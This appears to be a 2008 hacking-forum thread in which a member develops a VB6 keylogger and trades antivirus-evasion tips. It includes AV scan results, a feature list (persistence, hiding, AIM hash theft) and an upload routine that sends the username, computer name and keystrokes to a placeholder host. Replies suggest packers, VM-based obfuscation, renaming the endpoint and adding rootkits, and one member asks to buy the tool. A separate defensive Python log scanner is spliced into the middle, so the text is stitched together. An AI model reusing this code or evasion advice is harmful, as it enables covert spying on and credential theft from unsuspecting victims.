welcome to digitalgangster.com, the coolest community for people who hack the gibson and make bajillions of dollars off of online marketing. please click here to register an account (it's free) and join in on a plethora of discussions with the internet elite.

Thread: Bypassing Heuristic AV scans

  1. #1
    312c's Avatar
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    2,760

    Default Bypassing Heuristic AV scans

    So I'm working on a project and trying to get it as invisible as possible to AVs. On first run it got picked up by 12; I managed to get it down to this. I understand why 4/5 are seeing it, but I don't understand what the "Dropped:" part of "Dropped:Generic.Malware.SL!.CB5471F7" is.

    Code:
    File Project1.exe received on 03.31.2008 20:28:54 (CET)
    Antivirus	Version		Last Update	Result
    AhnLab-V3	2008.4.1.0	2008.03.31	-
    AntiVir		7.6.0.78	2008.03.31	HEUR/Malware
    Authentium	4.93.8		2008.03.30	-
    Avast		4.7.1098.0	2008.03.30	-
    AVG		7.5.0.516	2008.03.31	-
    BitDefender	7.2		2008.03.31	Dropped:Generic.Malware.SL!.CB5471F7
    CAT-QuickHeal	9.50		2008.03.31	-
    ClamAV		0.92.1		2008.03.31	-
    DrWeb		4.44.0.09170	2008.03.31	-
    eSafe		7.0.15.0	2008.03.31	-
    eTrust-Vet	31.3.5658	2008.03.31	-
    Ewido		4.0		2008.03.31	-
    F-Secure	6.70.13260.0	2008.03.31	-
    FileAdvisor	1		2008.03.31	-
    Fortinet	3.14.0.0	2008.03.31	-
    Ikarus		T3.1.1.20	2008.03.31	-
    Kaspersky	7.0.0.125	2008.03.31	-
    McAfee		5263		2008.03.31	-
    Microsoft	1.3301		2008.03.31	-
    NOD32v2		2987		2008.03.31	probably unknown NewHeur_PE virus
    Norman		5.80.02		2008.03.31	-
    Panda		9.0.0.4		2008.03.31	Suspicious file
    Prevx1		V2		2008.03.31	-
    Rising		20.38.01.00	2008.03.31	-
    Sophos		4.28.0		2008.03.31	-
    Sunbelt		3.0.978.0	2008.03.18	-
    Symantec	10		2008.03.31	-
    TheHacker	6.2.92.259	2008.03.30	-
    VBA32		3.12.6.3	2008.03.25	-
    VirusBuster	4.3.26:9	2008.03.31	-
    Webwasher-Gate	6.6.2		2008.03.31	Heuristic.Malware
    Additional information
    File size: 36864 bytes
    MD5: 020a8fb298a12bc44757c1929726ad3e
    SHA1: ae5de0c19b48b1deddabb34ae4bbff2f70082889
    PEiD: -


    Cow's Fan Club:
    hidden content - click on the image below to display it: revealed content:
    Quote Originally Posted by dawninja View Post
    cows are the mooiest
    Quote Originally Posted by Craig View Post
    look at that fuckin cow
    Quote Originally Posted by nikki View Post
    i love your sig.
    we should date
    Quote Originally Posted by ytcracker View Post
    cow is like sup
    Quote Originally Posted by ghostloader View Post
    fuck da Cooooooooooowwwwwwwwwwww
    Quote Originally Posted by gullydwarf View Post
    that cow is like straight chillin
    Quote Originally Posted by Zain View Post
    im gonna make like a cow and mooooove on over to the next thread
    Quote Originally Posted by barack obama View Post
    I like 312c's horse.
    Quote Originally Posted by sub View Post
    i want to be in that sexy hidden cow sig
    Quote Originally Posted by insain View Post
    we have the happiest cows.

  2. #2
    312c's Avatar
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    2,760

    Default

    Well, I got it down to this just by encoding all the strings inside the program with base64 and then decoding them inside the program.

    Panda 9.0.0.4 2008.03.31 Suspicious file
    NOD32v2 2987 2008.03.31 probably unknown NewHeur_PE virus



  3. #3

    Default

    hmmm

    calling versh itt

  4. #4

    Default

    NOD32 ftw

  5. #5
    i fuck in the name of dg mhu's Avatar
    Join Date
    Dec 2005
    Posts
    25,279

    Default

    very interesting

    I will enjoy seeing this pan out
    a.k.a Hous Bin Pharteen

  6. #6
    Epotn's Avatar
    Join Date
    Jan 2007
    Location
    here
    Posts
    410

    Default

    what's it do?

  7. #7
    312c's Avatar
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    2,760

    Default

    Still only detected as:
    Panda 9.0.0.4 2008.03.31 Suspicious file
    NOD32v2 2987 2008.03.31 probably unknown NewHeur_PE virus

    and what it is, is a keylogger in vb6 (bleh).

    Does the following:
    -records keystrokes (duh)
    -records the window/time
    -moves itself to a system folder
    -injects itself into startup
    -hides from application list in task manager
    -unseen by user
    -uploads logs to a website
    -steals aim password hashes

    What it doesn't do yet:
    -be invisible under the process list in task manager

    NOTE: this is my first ever program in vb6

    I'm having a problem, though, with it not ending ieexplorer.exe when it closes.
    Last edited by 312c; 03-31-2008 at 09:38 PM.



  8. #8
    312c's Avatar
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    2,760

    Default

    Code:
    Private Sub upload()
        Dim ie
        Set ie = CreateObject("InternetExplorer.Application")
    
        Dim szUser As String
        Dim vers As String
        szUser = Space(255)
        vers = Space(255)
        Dim lReturn, comp As Long
        lReturn = GetUserNameA(szUser, 255)
        comp = GetComputerNameA(vers, 1024)
        vers = Trim(Left$(vers, InStr(1, vers, Chr$(0)) - 1))
        szUser = Trim(Left$(szUser, InStr(1, szUser, Chr$(0)) - 1))
         
    Dim site As String
    
    site = "http://<SITENAME>/log.php?pw=PASSWORD&v="
    site = site + vers + "~" + szUser
    site = site + "&log=" & Replace$(Replace$(Text1.Text, "+", "&#37;2B"), "=", "%3D")
    ie.navigate2 site
    Do
    DoEvents
    Loop While ie.Busy = True
    
    ie.Quit
    Set ie = Nothing
    
    Text1.Text = ""
    End Sub
    Every time I run this it says "method navigate of object iwebbrowser2 failed" on the line 'ie.navigate2 site'. Any suggestions?



  9. #9

    Default

    Quote Originally Posted by 312c View Post
    So I'm working on a project and trying to get it as invisible as possible to AV's. On first run it got picked up by 12, managed to get it down to this. I understand why 4/5 are seeing it, but I don't understand what "Dropped:Generic.Malware.SL!.CB5471F7" the dropped part of this is.

    a dropper is a program that either a) copies itself to the root filesystem directory [aka C:\windows\xxxx] or b) drops a file onto a website; the point is a file is being dropped somewhere. Your best bet is to use some very small and little known packer to pack your application. It's not detecting your strings, it's detecting your method, so to get around this requires changing your method up. I can see you're just doing it in VB so packing would be your best option. When I write programs in C, I code a small virtual machine and encode the 'bad' methods with their own opcodes, and have them decode themselves on the fly, so heuristics won't even know what they are looking at, except maybe NOD32. hope this helps, holla @ google for more infos. pz!

    edit: after looking at the source.. if that is the whole thing, i'm guessing the heuristics know that computer information is being retrieved and then 'dropped' on a website.
    Last edited by w00b; 04-01-2008 at 09:36 AM.

  10. #10
    i'm a dirty jew sn1per's Avatar
    Join Date
    Nov 2007
    Location
    Morocco
    Posts
    8,433

    Default

    Just shooting in the dark here but I would replace

    http://<SITENAME>/log.php?pw=PASSWORD&v="

    With something more inconspicuous. trout.php?lake=FISH&

    Officially the unofficial radio of DG: www.gangster.fm
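    A defender-side counterpart to what w00b describes (machine and user name retrieved, then dropped onto a website) and to sn1per's suggested rename, as an added example that is not part of this thread: a small Python scanner that flags the structural indicators of the posted upload() routine in web-proxy log lines. The log lines, their format and the domain are constructed; the third line uses the renamed trout.php script from sn1per's post to show that renaming the endpoint leaves the same indicators in place.

```python
from __future__ import annotations
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log lines (hypothetical; not from the thread).
# Assumed format: "<timestamp> <client_ip> <method> <url> <status>".
# Line 1 mirrors the query string built by the posted upload() routine;
# line 3 is the same traffic with sn1per's renamed script and a base64 body.
SAMPLE_LOG = """\
2008-03-31T20:28:54Z 10.0.0.5 GET http://example.invalid/log.php?pw=PASSWORD&v=WORKSTATION1~alice&log=hello%20world%3D 200
2008-03-31T20:29:10Z 10.0.0.7 GET http://example.invalid/index.php?page=2 200
2008-03-31T20:30:02Z 10.0.0.5 GET http://example.invalid/trout.php?lake=FISH&v=WORKSTATION1~alice&log=aGVsbG8gd29ybGQ%3D 200
2008-03-31T20:31:00Z 10.0.0.9 GET http://example.invalid/search?q=v%3Dmachine 200
"""

# "<computername>~<username>": NetBIOS computer names are at most 15 characters.
HOST_USER_RE = re.compile(r"^[A-Za-z0-9_-]{1,15}~[A-Za-z0-9._-]{1,20}$")
LOG_LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def score_request(url: str, min_log_len: int = 8) -> list[str]:
    """Return the indicators a request URL trips; an empty list means none."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    hits: list[str] = []
    # 1. a host~user token in any query value (what the VB6 code concatenates)
    if any(HOST_USER_RE.match(v) for vals in q.values() for v in vals):
        hits.append("host~user")
    # 2. a 'log' parameter carrying more than a trivial payload (the keystroke buffer)
    if any(len(v) >= min_log_len for v in q.get("log", [])):
        hits.append("log-payload")
    # 3. a shared secret passed in the clear as 'pw'
    if "pw" in q:
        hits.append("pw-in-query")
    return hits


def scan_log(text: str, min_hits: int = 2) -> list[tuple[str, list[str]]]:
    """Parse log lines; return (client_ip, indicators) for requests with >= min_hits indicators."""
    flagged: list[tuple[str, list[str]]] = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash on them
        _ts, client, _method, url, _status = m.groups()
        hits = score_request(url)
        if len(hits) >= min_hits:
            flagged.append((client, hits))
    return flagged


if __name__ == "__main__":
    for client, hits in scan_log(SAMPLE_LOG):
        print(f"{client}: {', '.join(hits)}")
```

    Requiring two independent indicators keeps a lone "pw" parameter or a single long query value from firing on ordinary web traffic.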


  11. #11
    312c's Avatar
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    2,760

    Default

    Quote Originally Posted by w00b View Post
    edit: after looking at the source.. if that is the whole thing, i'm guessing the heuristics know that computer information is being retrieved and then 'dropped' on a website.
    That's just a little bit of the full code, and it was being picked up as a dropper before I even added that bit into it.

    Quote Originally Posted by sn1per View Post
    Just shooting in the dark here but I would replace

    http://<SITENAME>/log.php?pw=PASSWORD&v="

    With something more inconspicuous. trout.php?lake=FISH&
    True, but I'm just trying to get it fully functional at the minute.



  12. #12
    plex's Avatar
    Join Date
    Feb 2005
    Location
    east coast
    Posts
    4,387

    Default

    i need to buy something like this
    holla

  13. #13
    312c's Avatar
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    2,760

    Default

    Quote Originally Posted by plex View Post
    i need to buy something like this
    holla

    I'll let ya know once it's finished.

    I fixed the issue I was having, the aim hashes weren't being URL encoded correctly.

    I'm also working on switching it to using POST and I'm adding in stealing firefox/ie/outlook/thunderbird passwords. Also attempting to add rootkit abilities to it so that it is 100% invisible to the user.



  14. #14
    i'm a dirty jew sn1per's Avatar
    Join Date
    Nov 2007
    Location
    Morocco
    Posts
    8,433

    Default

    It would be nice if you posted this up like you did your cracker



  15. #15
    Epotn's Avatar
    Join Date
    Jan 2007
    Location
    here
    Posts
    410

    Default

    Quote Originally Posted by 312c View Post
    What it doesn't do yet:
    -be invisible under the process list in task manager
    there was like this mini tutorial on neworder that was making a keylogger in vb and i was curious to see how some people tried to get it invisible to the process manager and from what i could tell it's not too hard, just have to go through google searches

  16. #16
    312c's Avatar
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    2,760

    Default

    Quote Originally Posted by Epotn View Post
    there was like this mini tutorial on neworder that was making a keylogger in vb and i was curious to see how some people tried to get it invisible to the process manager and from what i could tell it's not too hard, just have to go through google searches

    yeah I found a kernel level driver that does that when tied into the program, just modifying it to not be detected now.



  17. #17
    Audio's Avatar
    Join Date
    Jun 2007
    Location
    banks back room
    Posts
    15,906

    Default

    this came up in a search so i bumped
    Coder for hire. Anything you need, outstanding prices and good return time.
    Contact: Skype - GetMoneyHo, AIM - theorangebox
